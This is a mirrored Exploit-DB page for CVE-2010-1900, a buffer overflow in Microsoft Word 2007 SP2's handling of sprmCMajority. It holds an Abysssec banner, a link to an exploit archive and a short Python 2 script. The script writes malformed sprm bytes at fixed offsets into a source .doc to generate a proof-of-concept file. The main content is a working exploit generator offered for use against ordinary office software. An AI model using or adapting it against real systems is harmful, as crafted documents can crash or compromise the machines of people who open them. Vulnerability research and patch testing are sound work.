Microsoft Word 2007 SP2 – sprmCMajority Buffer Overflow - 体验盒子

作者： Abysssec

日期： 2010-09-11

类别：

dos

平台：

windows

来源：https://www.exploit-db.com/exploits/14971/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

'''

________ __ ____

|\/|/ __ \ /\| || |_ \

| \/ | || | /\ | || | |_) |

| |\/| | || |/ /\ \| || |_ <

| || | |__| / ____ \ |__| | |_) |

|_||_|\____/_/\_\____/|____/

http://www.exploit-db.com/moaub11-microsoft-office-word-sprmcmajority-buffer-overflow/

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14971.zip (moaub-11-exploit.zip)

'''

Title :Microsoft Office Word sprmCMajority buffer overflow

Version :Word 2007 SP 2

Analysis :http://www.abysssec.com

Vendor:http://www.microsoft.com

Impact:Critical

Contact :shahin [at] abysssec.com , info[at] abysssec.com

Twitter :@abysssec

CVE :CVE-2010-1900

'''

import sys

def main():

try:

fdR = open('src.doc', 'rb+')

strTotal = fdR.read()

str1 = strTotal[:4082]

str2 = strTotal[4088:]

sprmCMajority = "\x47\xCA\xFF"# sprmCMajority

sprmPAnld80 = "\x3E\xC6\xFF"# sprmPAnld80

fdW= open('poc.doc', 'wb+')

fdW.write(str1)

fdW.write(sprmCMajority)

fdW.write(sprmPAnld80)

fdW.write(str2)

fdW.close()

fdR.close()

print '[-] Word file generated'

except IOError:

print '[*] Error : An IO error has occurred'

print '[-] Exiting ...'

sys.exit(-1)

if __name__ == '__main__':

main()